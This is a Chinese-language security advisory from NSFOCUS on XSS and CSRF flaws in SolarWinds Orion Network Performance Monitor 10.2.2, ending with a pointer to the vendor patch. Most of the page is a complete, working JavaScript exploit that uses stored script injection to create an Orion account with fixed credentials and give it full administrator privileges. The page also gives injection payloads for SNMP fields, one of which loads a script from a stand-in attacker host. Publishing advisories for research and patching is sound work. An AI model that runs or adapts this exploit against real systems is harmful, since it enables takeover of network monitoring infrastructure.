安全研究

安全漏洞
SolarWinds Orion Network Performance Monitor (NPM)多个安全漏洞

发布日期:2012-07-21
更新日期:2012-08-06

受影响系统:
SolarWinds Orion Network Performance Monitor (NPM) 10.2.2
描述:
BUGTRAQ  ID: 54624

Orion Network Performance Monitor是带宽性能监控和故障管理软件,能监控并收集来自路由器、交换机、服务器和其他SNMP设备中的数据。

SolarWinds Orion Network Performance Monitor (NPM) 10.2.2及其他版本在实现上存在跨站请求伪造漏洞和多个HTML注入漏洞,攻击者可利用这些漏洞在用户会话中执行非法操作,在受影响站点中执行脚本代码,窃取cookie身份验证凭证或控制站点外观。

<*来源:Muts (muts@whitehat.co.il
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Muts (muts@whitehat.co.il)提供了如下测试方法:



syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script

syscontact <script src="http://www.example.com/evil.js"></script>

*/


function getCookie(c_name)
{
    var i,x,y,ARRcookies=document.cookie.split(";");
    for (i=0;i<ARRcookies.length;i++)
    {
        x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
        y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
        x=x.replace(/^\s+|\s+$/g,"");
        if (x==c_name)
        {
            return unescape(y);
        }
    }
}

function setCookie(c_name,value,exdays)
{
    var exdate=new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value=escape(value) + ((exdays==null) ? "" : ";
expires="+exdate.toUTCString());
    document.cookie=c_name + "=" + c_value;
}

function postCredentials(viewState, user, password)
{
    var http = new XMLHttpRequest();
    var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
    
    var params =
"ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager"
+ "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
                 "__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
                 "__EVENTARGUMENT" + "=" + "&" +
                 "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName"
+ "=" + user + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password"
+ "=" + password + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword"
+ "=" + password + "&" +
                 "__ASYNCPOST" + "=" + "false"
                  
    http.open("POST", url, false);
    http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
    http.setRequestHeader("Content-lenth", params.length);
    http.setRequestHeader("Connection", "close");
    http.send(params);
    var response = http.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = response;
    return(doc);
}

function setAdminPriv(viewState, username)
{
    var http = new XMLHttpRequest();
    var url = "/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username +
"&AccountType=Edit";
    
    var params = "__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton"
+ "&" +
                 "__EVENTARGUMENT" + "=" + "&" +
                 "__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible"
+ "=" + "hidden" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires"
+ "=" + "Never" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox"
+ "=" + "true" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound"
+ "=" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems"
+ "=" + "50" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars"
+ "=" + "Default" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars"
+ "=" + "Network_TabMenu" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars"
+ "=" + "Virtualization_TabMenu" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView"
+ "=" + "1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView"
+ "=" + "1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder"
+ "=" + "%5CReports" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails"
+ "=" + "-1" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails"
+ "=" + "3" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails"
+ "=" + "7" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails"
+ "=" + "14" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails"
+ "=" + "22" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails"
+ "=" + "24" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "9" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "10" + "&" +
                 "ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "11"

    http.open("POST", url, false);
    http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
    http.setRequestHeader("Content-lenth", params.length);
    http.setRequestHeader("Connection", "close");
    http.send(params);
    var response = http.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = response;
    return(doc);
}

function getHtmlBody(url, ref)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open('GET', url, false);
    xmlHttp.send(null);
    var results = xmlHttp.responseText;
    var doc = document.implementation.createHTMLDocument('');
    doc.documentElement.innerHTML = results;
    return(doc);
}

function getViewState(doc)
{
    return(doc.getElementById("__VIEWSTATE"));
}

var username = "myuser";
var password = "test";

// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
    // Get the initial view-state
    var doc1 =
getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
    
    // Create a new account with the given credentials
    postCredentials(getViewState(doc1).value, username, password);
    
    // Get the edit account view-state
    var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID="
+ username + "&AccountType=Edit");
    
    // Assign our new account with administrative privileges
    setAdminPriv(getViewState(doc2).value, username);
    
    // Set the cookie to avoid duplicated attacks
    setCookie("o1", 1, "");
}

建议:
厂商补丁:

SolarWinds
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://solarwinds.net

浏览次数:2033
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客